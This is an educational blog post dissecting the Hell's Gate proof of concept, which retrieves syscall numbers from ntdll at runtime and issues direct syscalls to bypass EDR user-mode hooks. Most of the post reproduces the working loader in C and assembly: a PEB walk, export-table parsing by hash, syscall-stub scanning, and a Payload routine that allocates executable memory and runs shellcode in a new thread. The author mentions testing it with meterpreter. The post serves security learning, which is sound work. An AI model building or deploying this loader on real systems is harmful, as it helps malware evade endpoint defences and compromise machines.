
Exploring Hell's Gate

TL;DR: To bypass user mode hooks implemented by Endpoint Detection and Response (EDR) systems, attackers (specifically red teams) employ various techniques for unhooking or bypassing these safeguards. The focus here is on the Hell's Gate Proof of Concept (POC), an approach that utilizes direct syscalls to bypass user mode hooks. Even though Hell's Gate POC has been around for a few years, it remains pivotal in the evolution of direct syscalls.

One key issue that Hell's Gate solves is the avoidance of hardcoded System Service Numbers (SSNs), also known as syscall IDs, in direct syscall POCs. Instead, it allows for the dynamic retrieval of SSNs from native functions within the ntdll.dll at runtime. This is crucial as SSNs can change between different versions of Windows, and in a realistic scenario or during a red team engagement, the target's specific Windows version is often unknown. Thus, hardcoding SSNs poses a risk and could lead to failure in the attack, a problem effectively addressed by the Hell's Gate technique.

Disclaimer

There is a great paper by the Hell's Gate authors am0nsec and RtlMateusz. But as always, the best way for me to learn about a topic is to dig deep into it and make a presentation or write a blog post. I'm not making any claims; I'm just trying to understand Hell's Gate and share it with the infosec community. The Hell's Gate POC can be found here.

Introduction

To avoid user mode hooks from EDRs, an attacker (red team) can either remove the hooks (unhooking) or bypass them using direct or indirect syscalls. In this blog post I will focus on the Hell's Gate POC, which uses direct syscalls to bypass user mode hooks. Although the POC is a few years old, in my opinion it was one of the most important steps in the evolution of direct syscalls. I also want to understand the code better, which is reason enough to take a closer look at it.

Why was Hell's Gate introduced, and what problem does it solve? Instead of hardcoding System Service Numbers (SSNs), also called syscall IDs, into a direct syscall POC, the Hell's Gate technique allows us to retrieve the SSNs of native functions dynamically from ntdll.dll at runtime. But why do we need this? The reason is simple: SSNs can differ between Windows versions and builds, and in a real-world scenario or red team engagement we usually do not know which version or build the target is running. Hardcoded SSNs are therefore risky and can cause the loader to fail.

Dynamic retrieval of SSNs

Regardless of whether we use a direct or indirect syscall shellcode loader, if we do not want to hardcode the SSNs from the native functions we use in our loader, we need to find a way to dynamically retrieve the SSNs from ntdll.dll at runtime. To achieve this, we can use several different techniques, as shown in the following examples.

  • Using GetModuleHandleA and GetProcAddress
  • PEB walk combined with EAT parsing
  • Build your own GetModuleHandleA and GetProcAddress functions

I think the simplest technique in this case is to call GetModuleHandleA to get the base address of ntdll.dll and then call GetProcAddress to get the memory address of a native function in ntdll.dll, e.g. NtAllocateVirtualMemory. However, from an opsec perspective this is not really recommended, because if GetModuleHandleA and/or GetProcAddress is hooked by the EDR, you will be caught. Therefore, among other things, we are going to take a closer look at how SSN retrieval is done in Hell's Gate by walking the PEB and parsing the EAT.

Hell's Gate in a nutshell

In short, Hell's Gate executes direct syscalls with SSNs that are retrieved dynamically. To do this, it combines walking the Process Environment Block (PEB), parsing the Export Address Table (EAT) of ntdll.dll, comparing the opcodes of each native function's syscall stub, and extracting the SSN from that stub. The main steps can be briefly described as follows.

  • The first step is to access the Thread Environment Block (TEB).
  • From there, access the PEB.
  • Walk the PEB loader data to get the base address of ntdll.dll.
  • Access the EAT of ntdll.dll.
  • Store a precomputed djb2 hash in the code for each native function that is needed.
  • Hash each function name retrieved from the EAT using the same djb2 algorithm.
  • Compare the hash of each EAT name with the precomputed hashes.
  • If they match, store the function address in the corresponding VX_TABLE_ENTRY of VX_TABLE.
  • Based on the (absolute) function address, compare the opcodes of the native function's syscall stub in ntdll.dll to check whether the function is hooked.
  • While scanning, stop if a syscall or ret opcode is reached first, to avoid running into the stub of a different native function and extracting the wrong SSN.
  • Use the HellsGate function to prepare the execution of a direct syscall.
  • Use the HellDescent function to execute the direct syscall.

To get a better understanding of the Hell's Gate POC in detail, we will break it down and take a closer look at it. We will start by having a look at the manually defined structures.

Hell's Gate Structures

typedef struct _VX_TABLE_ENTRY {
	PVOID   pAddress;
	DWORD64 dwHash;
	WORD    wSystemCall;
} VX_TABLE_ENTRY, * PVX_TABLE_ENTRY;

Starting at the top of the code, we can identify two defined structures called _VX_TABLE_ENTRY and _VX_TABLE. The first structure, _VX_TABLE_ENTRY, contains three members of different data types and serves as the template for the entries in the second structure (or table), _VX_TABLE.

  • pAddress holds the memory address of a native function e.g. NtAllocateVirtualMemory
  • dwHash stores the djb2 hash of a function e.g. NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b
  • wSystemCall holds the SSN of a native function e.g. NtAllocateVirtualMemory

typedef struct _VX_TABLE {
	VX_TABLE_ENTRY NtAllocateVirtualMemory;
	VX_TABLE_ENTRY NtProtectVirtualMemory;
	VX_TABLE_ENTRY NtCreateThreadEx;
	VX_TABLE_ENTRY NtWaitForSingleObject;
} VX_TABLE, * PVX_TABLE;

Based on _VX_TABLE_ENTRY, _VX_TABLE then holds pAddress, dwHash and wSystemCall for each entry in the table, and each entry represents one of four native functions used in Hell's Gate. The _VX_TABLE contains all the necessary data for the preparation and execution of the direct syscalls.

In short, these structures are used to store and organise the data that is later used in the code to execute direct syscalls, so that it can easily be looked up when needed. Because the syscalls are executed directly and not through the stubs in ntdll.dll, the function addresses and SSNs have to be stored somewhere, which is what these structures are for.

Hell's Gate Functions

In the next step, Hell's Gate defines different types of functions that will be used in the code. Let us take a closer look at each function.

RtlGetThreadEnvironmentBlock

PTEB RtlGetThreadEnvironmentBlock();

The RtlGetThreadEnvironmentBlock() function is used to get a pointer (PTEB) to the TEB of the current thread. The TEB is a data structure that stores information about the state of the current thread. Later we will see that the address of the TEB is needed to get the address of the PEB.

PTEB RtlGetThreadEnvironmentBlock() {
#if _WIN64
	return (PTEB)__readgsqword(0x30);
#else
	return (PTEB)__readfsdword(0x16);
#endif
}

It checks the _WIN64 macro to determine whether the code is being compiled for a 64-bit Windows platform. If it is, the intrinsic function __readgsqword(0x30) reads a quadword (64 bits) at offset 0x30 of the GS segment, which on 64-bit Windows holds the TEB's pointer to itself. If _WIN64 is not defined (32-bit build), the intrinsic function __readfsdword is used instead to read a double word (32 bits) from the FS segment, which contains the TEB on 32-bit Windows. Note that the POC passes 0x16 here, whereas the TEB self-pointer on 32-bit Windows is located at offset 0x18, so the 32-bit branch looks like a typo in the POC. Since the rest of Hell's Gate (the opcode checks and the assembly) targets x64 only, this branch is not used in practice. In both cases the value read is returned as a pointer (PTEB) to the TEB.

GetImageExportDirectory

BOOL GetImageExportDirectory(
	_In_ PVOID                     pModuleBase,
	_Out_ PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory
);

The purpose of the GetImageExportDirectory function is to retrieve the _IMAGE_EXPORT_DIRECTORY of a given module. Later, when we look at the main function, we will see that GetImageExportDirectory is used to get the address of the _IMAGE_EXPORT_DIRECTORY of the ntdll.dll module.

BOOL GetImageExportDirectory(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY* ppImageExportDirectory) {
	// Get DOS header
	PIMAGE_DOS_HEADER pImageDosHeader = (PIMAGE_DOS_HEADER)pModuleBase;
	if (pImageDosHeader->e_magic != IMAGE_DOS_SIGNATURE) {
		return FALSE;
	}

	// Get NT headers
	PIMAGE_NT_HEADERS pImageNtHeaders = (PIMAGE_NT_HEADERS)((PBYTE)pModuleBase + pImageDosHeader->e_lfanew);
	if (pImageNtHeaders->Signature != IMAGE_NT_SIGNATURE) {
		return FALSE;
	}

	// Get the EAT
	*ppImageExportDirectory = (PIMAGE_EXPORT_DIRECTORY)((PBYTE)pModuleBase + pImageNtHeaders->OptionalHeader.DataDirectory[0].VirtualAddress);
	return TRUE;
}

The GetImageExportDirectory function basically parses a module in memory to find and return a pointer to its export directory. This directory is crucial when the code needs to find a function exported by a DLL by name, as it references all the exported function names and their corresponding relative virtual addresses (RVAs).

Specifically, the GetImageExportDirectory function does the following:

  • To read the structure of a PE file, we first need a pointer pImageDosHeader to the _IMAGE_DOS_HEADER. By checking the e_magic field we make sure that we are really reading a PE file. If the field is not equal to the expected value (IMAGE_DOS_SIGNATURE), the function returns FALSE, indicating that the provided module is not a valid PE image.

  • Once we have the address of the _IMAGE_DOS_HEADER, we can access e_lfanew, a field in the DOS header that contains the offset to the NT headers. Again, validation is implemented by checking that the Signature field of the _IMAGE_NT_HEADERS holds the expected value (IMAGE_NT_SIGNATURE).

  • Finally, access the export directory via the DataDirectory array, which is part of the optional header (_IMAGE_OPTIONAL_HEADER64 in a 64-bit build). The first entry in the DataDirectory (index 0) holds the RVA of the _IMAGE_EXPORT_DIRECTORY, which contains information about the functions exported by the module, in the case of ntdll.dll e.g. NtAllocateVirtualMemory, NtProtectVirtualMemory etc.

Later we will see that the base address of ntdll.dll and the address of the _IMAGE_EXPORT_DIRECTORY are needed to access the following three entries in the _IMAGE_EXPORT_DIRECTORY:

  • AddressOfFunctions
  • AddressOfNames
  • AddressOfNameOrdinals

These in turn are needed to finally get the (absolute) memory address of the native functions, e.g. NtAllocateVirtualMemory. But more on this later.

djb2 Hashing

DWORD64 djb2(PBYTE str) {
	DWORD64 dwHash = 0x7734773477347734;
	INT c;

	while (c = *str++)
		dwHash = ((dwHash << 0x5) + dwHash) + c;

	return dwHash;
}

The djb2 function calculates the djb2 hash for a given string. Why is this function needed? Later we will see that in the context of the GetVxTableEntry function, djb2 is used to hash the name of each function in the EAT. These hashes are then compared to the dwHash field of the pVxTableEntry structure.

GetVxTableEntry

BOOL GetVxTableEntry(
	_In_ PVOID pModuleBase,
	_In_ PIMAGE_EXPORT_DIRECTORY pImageExportDirectory,
	_In_ PVX_TABLE_ENTRY pVxTableEntry
);

BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);

	for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
			pVxTableEntry->pAddress = pFunctionAddress;

			// Quick and dirty fix in case the function has been hooked
			WORD cw = 0;
			while (TRUE) {
				// check if syscall, in this case we are too far
				if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
					return FALSE;

				// check if ret, in this case we are also probaly too far
				if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
					return FALSE;

				// First opcodes should be :
				//    MOV R10, RCX
				//    MOV RCX, <syscall>
				if (*((PBYTE)pFunctionAddress + cw) == 0x4c
					&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
					&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
					&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
					&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
					&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
					BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
					BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
					pVxTableEntry->wSystemCall = (high << 8) | low;
					break;
				}

				cw++;
			};
		}
	}

	return TRUE;
}

In short, based on the base address of ntdll.dll and the _IMAGE_EXPORT_DIRECTORY, the GetVxTableEntry function is responsible for calculating the absolute memory address of a native function in ntdll.dll. It is also responsible for checking, by means of an opcode comparison, whether the native function is hooked. If it is not hooked, the function retrieves the SSN and stores it in the wSystemCall member of the appropriate VX_TABLE_ENTRY. To better understand this function, let us break it down.

BOOL GetVxTableEntry(PVOID pModuleBase, PIMAGE_EXPORT_DIRECTORY pImageExportDirectory, PVX_TABLE_ENTRY pVxTableEntry) {
	PDWORD pdwAddressOfFunctions = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfFunctions);
	PDWORD pdwAddressOfNames = (PDWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNames);
	PWORD pwAddressOfNameOrdinales = (PWORD)((PBYTE)pModuleBase + pImageExportDirectory->AddressOfNameOrdinals);

	for (WORD cx = 0; cx < pImageExportDirectory->NumberOfNames; cx++) {
		PCHAR pczFunctionName = (PCHAR)((PBYTE)pModuleBase + pdwAddressOfNames[cx]);
		PVOID pFunctionAddress = (PBYTE)pModuleBase + pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]];

		if (djb2(pczFunctionName) == pVxTableEntry->dwHash) {
			pVxTableEntry->pAddress = pFunctionAddress;

In the first part, GetVxTableEntry creates pointers to the AddressOfFunctions, AddressOfNames and AddressOfNameOrdinals arrays referenced by the _IMAGE_EXPORT_DIRECTORY. These arrays contain the relative virtual addresses (RVAs) of the exported functions, the RVAs of the function name strings, and the ordinal indexes that map each name to its slot in AddressOfFunctions, respectively.

It then iterates through all the function names in the AddressOfNames array. For each name, it calculates the absolute address of the function by adding the base address of ntdll.dll to the function's RVA and keeps it in the pFunctionAddress variable. It also calculates the djb2 hash of the name and compares it to the hash passed in the VX_TABLE_ENTRY structure. If the hashes match, the function has been found, and the absolute address is stored in the pAddress member of the VX_TABLE_ENTRY structure.
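The name-to-address lookup described above can be sketched in portable C with mock data. Everything here (MockExports, resolve_export, the sample values) is hypothetical and simplified: the real arrays hold RVAs that must be added to the module base, and Hell's Gate compares djb2 hashes rather than calling strcmp. The point of the sketch is only the double indirection through the ordinal array.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Hypothetical, simplified stand-in for the three export arrays. */
typedef struct {
    const char    **names;      /* like AddressOfNames, already resolved to strings */
    const uint16_t *ordinals;   /* like AddressOfNameOrdinals: index into functions[] */
    const uint32_t *functions;  /* like AddressOfFunctions: RVAs */
    uint32_t        number_of_names;
} MockExports;

/* Returns base + RVA of the named export, or 0 if the name is not found. */
static uintptr_t resolve_export(uintptr_t base, const MockExports *exp, const char *wanted) {
    assert(exp != NULL && wanted != NULL);

    for (uint32_t i = 0; i < exp->number_of_names; i++) {
        if (strcmp(exp->names[i], wanted) == 0) {
            /* names[i] and ordinals[i] belong together; the ordinal
             * selects the slot in the functions array */
            uint16_t slot = exp->ordinals[i];
            return base + exp->functions[slot];
        }
    }
    return 0;
}
```

The important detail is that the i-th name does not map to the i-th function. The name index first has to be translated through the ordinal array, which is exactly what pdwAddressOfFunctions[pwAddressOfNameOrdinales[cx]] does in the POC.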

// Quick and dirty fix in case the function has been hooked
			WORD cw = 0;
			while (TRUE) {
				// check if syscall, in this case we are too far
				if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
					return FALSE;

				// check if ret, in this case we are also probaly too far
				if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
					return FALSE;

				// First opcodes should be :
				//    MOV R10, RCX
				//    MOV RCX, <syscall>
				if (*((PBYTE)pFunctionAddress + cw) == 0x4c
					&& *((PBYTE)pFunctionAddress + 1 + cw) == 0x8b
					&& *((PBYTE)pFunctionAddress + 2 + cw) == 0xd1
					&& *((PBYTE)pFunctionAddress + 3 + cw) == 0xb8
					&& *((PBYTE)pFunctionAddress + 6 + cw) == 0x00
					&& *((PBYTE)pFunctionAddress + 7 + cw) == 0x00) {
					BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
					BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
					pVxTableEntry->wSystemCall = (high << 8) | low;
					break;
				}

In the second part of the GetVxTableEntry function, Hell's Gate reads the bytes of the syscall stub starting at the address of the native function in ntdll.dll. It checks for the bytes 0x4c, 0x8b, 0xd1 (mov r10, rcx) followed by 0xb8 (the opcode of mov eax, imm32; the comment in the POC says RCX, but 0xb8 loads eax), then skips the two bytes that hold the SSN and checks that the next two bytes are 0x00, 0x00. If the pattern does not match at the current position, the offset cw is increased by one and the comparison is repeated one byte further on.

If we look at the figure above, we can see that these values are the opcode bytes of an unhooked (clean) syscall stub of a native function. If the comparison succeeds, i.e. the native function is not hooked, the SSN is extracted and stored in the wSystemCall member of the corresponding VX_TABLE_ENTRY in _VX_TABLE. This procedure is repeated for all four functions in _VX_TABLE.

// check if syscall, in this case we are too far
				if (*((PBYTE)pFunctionAddress + cw) == 0x0f && *((PBYTE)pFunctionAddress + cw + 1) == 0x05)
					return FALSE;

				// check if ret, in this case we are also probaly too far
				if (*((PBYTE)pFunctionAddress + cw) == 0xc3)
					return FALSE;


To avoid accidentally extracting the System Service Number (SSN) of a neighbouring system call, the code uses two if statements at the start of the loop. They check for the syscall (0x0f, 0x05) and ret (0xc3) opcodes that mark the end of a syscall stub. If the loop encounters one of these before it has found the opcode sequence 0x4c, 0x8b, 0xd1, 0xb8 with the trailing 0x00, 0x00, the scan has gone too far without finding a clean stub, for example because the start of the stub was overwritten by a hook. In that case the function returns FALSE instead of continuing into the next stub.

BYTE high = *((PBYTE)pFunctionAddress + 5 + cw);
BYTE low = *((PBYTE)pFunctionAddress + 4 + cw);
pVxTableEntry->wSystemCall = (high << 8) | low;


To finally extract the SSN from the syscall stub, the code reads the bytes at offsets 5 and 4, counted from 0x4c at offset 0. First the high byte (most significant byte, offset 5) of the syscall ID is read, then the low byte (least significant byte, offset 4). These two bytes are then combined to form the complete syscall ID.

While the data is stored in memory in little-endian format (low byte at the lower address and high byte at the higher address), the code reads the high byte first and the low byte second. However, it then correctly shifts the high byte 8 places to the left (high << 8) and combines it with the low byte to construct the correct 16-bit syscall ID, respecting the little-endian format.
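The scan and the extraction can be tried out on plain byte arrays without touching ntdll.dll. The following is a minimal sketch under my own assumptions: extract_ssn is a hypothetical name, and the max_len bound is something I added so the example cannot read past the end of the test buffer (the loop in the POC has no such bound).

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Scans forward from `stub` for the clean x64 stub prologue and returns
 * the SSN, or -1 if a syscall/ret opcode is hit first or max_len is
 * exhausted. Hypothetical helper for illustration only. */
static int extract_ssn(const uint8_t *stub, size_t max_len) {
    assert(stub != NULL);

    for (size_t cw = 0; cw + 8 <= max_len; cw++) {
        /* syscall (0f 05): we ran past the start of the stub */
        if (stub[cw] == 0x0f && stub[cw + 1] == 0x05)
            return -1;
        /* ret (c3): same conclusion */
        if (stub[cw] == 0xc3)
            return -1;

        /* 4c 8b d1 = mov r10, rcx ; b8 lo hi 00 00 = mov eax, imm32 */
        if (stub[cw] == 0x4c && stub[cw + 1] == 0x8b && stub[cw + 2] == 0xd1 &&
            stub[cw + 3] == 0xb8 && stub[cw + 6] == 0x00 && stub[cw + 7] == 0x00) {
            uint8_t low  = stub[cw + 4];   /* little-endian: low byte first */
            uint8_t high = stub[cw + 5];
            return (high << 8) | low;
        }
    }
    return -1;
}
```

Feeding it a clean stub (4c 8b d1 b8 18 00 00 00 ...) yields 0x18, while a stub whose first five bytes were replaced by a jmp (e9 ...) makes the scan run into the syscall opcode and fail. That failure case is the limitation of Hell's Gate mentioned in the summary.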

Payload

BOOL Payload(
	_In_ PVX_TABLE pVxTable
);

BOOL Payload(PVX_TABLE pVxTable) {
	NTSTATUS status = 0x00000000;
	char shellcode[] = "\xfc\x48\x83";

	// Allocate memory for the shellcode
	PVOID lpAddress = NULL;
	SIZE_T sDataSize = sizeof(shellcode);
	HellsGate(pVxTable->NtAllocateVirtualMemory.wSystemCall);
	status = HellDescent((HANDLE)-1, &lpAddress, 0, &sDataSize, MEM_COMMIT, PAGE_READWRITE);

	// Write Memory
	VxMoveMemory(lpAddress, shellcode, sizeof(shellcode));

	// Change page permissions
	ULONG ulOldProtect = 0;
	HellsGate(pVxTable->NtProtectVirtualMemory.wSystemCall);
	status = HellDescent((HANDLE)-1, &lpAddress, &sDataSize, PAGE_EXECUTE_READ, &ulOldProtect);

	// Create thread
	HANDLE hHostThread = INVALID_HANDLE_VALUE;
	HellsGate(pVxTable->NtCreateThreadEx.wSystemCall);
	status = HellDescent(&hHostThread, 0x1FFFFF, NULL, (HANDLE)-1, (LPTHREAD_START_ROUTINE)lpAddress, NULL, FALSE, NULL, NULL, NULL, NULL);

	// Wait for 1 seconds
	/*LARGE_INTEGER Timeout;
	Timeout.QuadPart = -10000000;*/
	HellsGate(pVxTable->NtWaitForSingleObject.wSystemCall);
	status = HellDescent(hHostThread, FALSE, NULL);

	return TRUE;
}

The Payload function is nothing special. Based on the external functions HellsGate and HellDescent, it is simply responsible for executing the direct syscalls that allocate virtual memory, change the page protection and run the shellcode, with VxMoveMemory copying the shellcode into the allocated memory in between. When running meterpreter shellcode, I observed that it was necessary to comment out the timeout code for NtWaitForSingleObject; otherwise the execution of the meterpreter shellcode failed.

VxMoveMemory

PVOID VxMoveMemory(
	_Inout_ PVOID dest,
	_In_    const PVOID src,
	_In_    SIZE_T len
);

The purpose of the VxMoveMemory function is to copy a block of memory from one location (src) to another (dest). It is similar in purpose to the memcpy function in the standard C library, but has a custom implementation for this code. The function is used to copy the shellcode into memory. In my opinion, this function is not essential and could be replaced by memcpy or the native NtWriteVirtualMemory function.
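Since only the prototype is shown above, here is a minimal sketch of what a memmove-style copy without the C runtime can look like. This is my own illustration, not necessarily the POC's exact implementation, and the name vx_move_memory_sketch is hypothetical.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Copies len bytes from src to dest and handles overlapping ranges by
 * choosing the copy direction. Hypothetical sketch for illustration. */
static void *vx_move_memory_sketch(void *dest, const void *src, size_t len) {
    assert(dest != NULL && src != NULL);

    unsigned char *d = (unsigned char *)dest;
    const unsigned char *s = (const unsigned char *)src;

    if ((uintptr_t)d < (uintptr_t)s) {
        /* destination is below the source: copy front to back */
        while (len--)
            *d++ = *s++;
    } else {
        /* destination is above the source: copy back to front so an
         * overlapping tail is not overwritten before it is read */
        d += len;
        s += len;
        while (len--)
            *--d = *--s;
    }
    return dest;
}
```

One possible reason for shipping such a helper instead of calling memcpy is to keep the loader independent of the C runtime, but that is my interpretation and not something stated in the POC.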

extern VOID HellsGate(WORD wSystemCall);
extern HellDescent();

; Hell's Gate
; Dynamic system call invocation 
; 
; by smelly__vx (@RtlMateusz) and am0nsec (@am0nsec)

.data
	wSystemCall DWORD 000h

.code 
	HellsGate PROC
		mov wSystemCall, 000h
		mov wSystemCall, ecx
		ret
	HellsGate ENDP

	HellDescent PROC
		mov r10, rcx
		mov eax, wSystemCall

		syscall
		ret
	HellDescent ENDP
end

In addition, Hell's Gate defines two external functions called HellsGate and HellDescent, which will be used to prepare and execute direct system calls.

The first procedure, HellsGate, takes an argument (the system call number) in the ecx register. The instruction mov wSystemCall, 000h initialises the variable wSystemCall to zero, but the next instruction mov wSystemCall, ecx immediately overwrites it with the value in ecx. This procedure is used to store the system call number in the global variable wSystemCall for later use.

The second procedure, HellDescent, actually executes the system call. On x64 Windows the kernel expects the system call number in the eax register and the first four arguments in r10, rdx, r8 and r9 (any further arguments are passed on the stack). The regular x64 calling convention passes the first argument in rcx, but the syscall instruction overwrites rcx with the return address, so the procedure first copies rcx to r10 and then loads the system call number (SSN) from wSystemCall into eax. Subsequently the syscall instruction is used to execute the syscall.

Hell's Gate Main Function

INT wmain() {
	PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();
	PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;
	if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
		return 0x1;

	// Get NTDLL module 
	PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);

	// Get the EAT of NTDLL
	PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
	if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
		return 0x01;

	VX_TABLE Table = { 0 };
	Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
		return 0x1;

	Table.NtCreateThreadEx.dwHash = 0x64dc7db288c5015f;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtCreateThreadEx))
		return 0x1;

	Table.NtProtectVirtualMemory.dwHash = 0x858bcb1046fb6a37;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtProtectVirtualMemory))
		return 0x1;

	Table.NtWaitForSingleObject.dwHash = 0xc6a2fa174e551bcb;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtWaitForSingleObject))
		return 0x1;

	Payload(&Table);
	return 0x00;
}

Last but not least, let us have a look at the main function and see how it all fits together by breaking it down step by step.

PTEB pCurrentTeb = RtlGetThreadEnvironmentBlock();

To get the base address of ntdll.dll without using the GetModuleHandleA API, we need to go through the PEB. But first we need a pointer, pCurrentTeb, to the TEB structure of the current thread.

PPEB pCurrentPeb = pCurrentTeb->ProcessEnvironmentBlock;

Next, the pointer pCurrentPeb is declared, pointing to the PEB. Based on the pointer pCurrentTeb pointing to the TEB, the PEB structure can be accessed using the -> operator.

if (!pCurrentPeb || !pCurrentTeb || pCurrentPeb->OSMajorVersion != 0xA)
		return 0x1;

In addition, Hell's Gate checks that the PEB and TEB have been successfully retrieved and that the major version of the operating system is 10 (0xA in hex). This means Hell's Gate expects to be running on Windows 10 or on a later release that also reports major version 10, such as Windows 11. On an older version of Windows, the function exits immediately with a return code of 0x1.

// Get NTDLL module 
	PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10);

With the next line of code, Hell's Gate declares pLdrDataEntry, a pointer of type PLDR_DATA_TABLE_ENTRY, and stores in it the address of the LDR_DATA_TABLE_ENTRY structure that belongs to the second module in the list, ntdll.dll. In my opinion this line of code is very important for understanding the concept of going through the PEB (PEB walk) to get the base address of a module, so let's break it down into chunks and go through it step by step.

pCurrentPeb->LoaderData

This accesses the LoaderData member of the PEB structure. The LoaderData member points to a PEB_LDR_DATA structure which contains information about the modules (DLLs) that have been loaded into the process.

pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink

The InMemoryOrderModuleList member is the head of a doubly linked list that connects the LDR_DATA_TABLE_ENTRY structures of all loaded modules. The Flink member is a pointer to the next entry in the linked list. Starting from the list head, it points to the entry for the main executable module of the process.

Additional information: A doubly linked list is a type of linked list in which each node contains a reference to both the next node and the previous node in the sequence.

pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink

By following the Flink member twice we now point to the second entry in the InMemoryOrderModuleList, which is usually the ntdll.dll module.

(PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10

This does pointer arithmetic to subtract 0x10 (16 in decimal) from the address of the ntdll.dll list node. This step is necessary because Flink does not point to the start of the LDR_DATA_TABLE_ENTRY but to the InMemoryOrderLinks member inside it, and that member is not the first member of the structure. On x64 it is preceded by InLoadOrderLinks, which consists of two 8-byte pointers, hence the offset of 0x10. Subtracting 0x10 therefore gives us the start of the LDR_DATA_TABLE_ENTRY structure for ntdll.dll.

(PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10)

Here we'll cast the resulting address to a PLDR_DATA_TABLE_ENTRY pointer. This gives us a pointer to the LDR_DATA_TABLE_ENTRY structure for ntdll.dll.

PLDR_DATA_TABLE_ENTRY pLdrDataEntry = (PLDR_DATA_TABLE_ENTRY)((PBYTE)pCurrentPeb->LoaderData->InMemoryOrderModuleList.Flink->Flink - 0x10)

Finally, we store this pointer in the pLdrDataEntry variable. After this line of code, pLdrDataEntry points to the LDR_DATA_TABLE_ENTRY structure for ntdll.dll. Based on this, we can access the base address of ntdll.dll in the next line of code.
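The "subtract the member offset" trick is the same thing the Windows CONTAINING_RECORD macro does. Here is a small portable sketch with reduced mock structures; MockListEntry, MockLdrEntry and entry_from_memory_link are hypothetical names, and the real LDR_DATA_TABLE_ENTRY has many more members.

```c
#include <assert.h>
#include <stddef.h>

/* Hypothetical, reduced stand-ins for LIST_ENTRY and LDR_DATA_TABLE_ENTRY. */
typedef struct MockListEntry {
    struct MockListEntry *Flink;
    struct MockListEntry *Blink;
} MockListEntry;

typedef struct {
    MockListEntry InLoadOrderLinks;    /* first member, two pointers wide */
    MockListEntry InMemoryOrderLinks;  /* the list that is walked in the POC */
    void         *DllBase;
} MockLdrEntry;

/* Recovers the owning entry from a pointer to its InMemoryOrderLinks
 * member by subtracting that member's offset within the structure. */
static MockLdrEntry *entry_from_memory_link(MockListEntry *link) {
    assert(link != NULL);
    return (MockLdrEntry *)((unsigned char *)link -
                            offsetof(MockLdrEntry, InMemoryOrderLinks));
}
```

With 8-byte pointers, offsetof(MockLdrEntry, InMemoryOrderLinks) evaluates to 16, which is the 0x10 that is hardcoded in the POC. Using offsetof (or CONTAINING_RECORD on Windows) instead of a literal keeps the code readable and avoids a silent break if the layout differs.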

// Get the EAT of NTDLL
	PIMAGE_EXPORT_DIRECTORY pImageExportDirectory = NULL;
	if (!GetImageExportDirectory(pLdrDataEntry->DllBase, &pImageExportDirectory) || pImageExportDirectory == NULL)
		return 0x01;

Now, we call the GetImageExportDirectory function to access the EAT from ntdll.dll.

VX_TABLE Table = { 0 };
	Table.NtAllocateVirtualMemory.dwHash = 0xf5bd373480a6b89b;
	if (!GetVxTableEntry(pLdrDataEntry->DllBase, pImageExportDirectory, &Table.NtAllocateVirtualMemory))
		return 0x1;

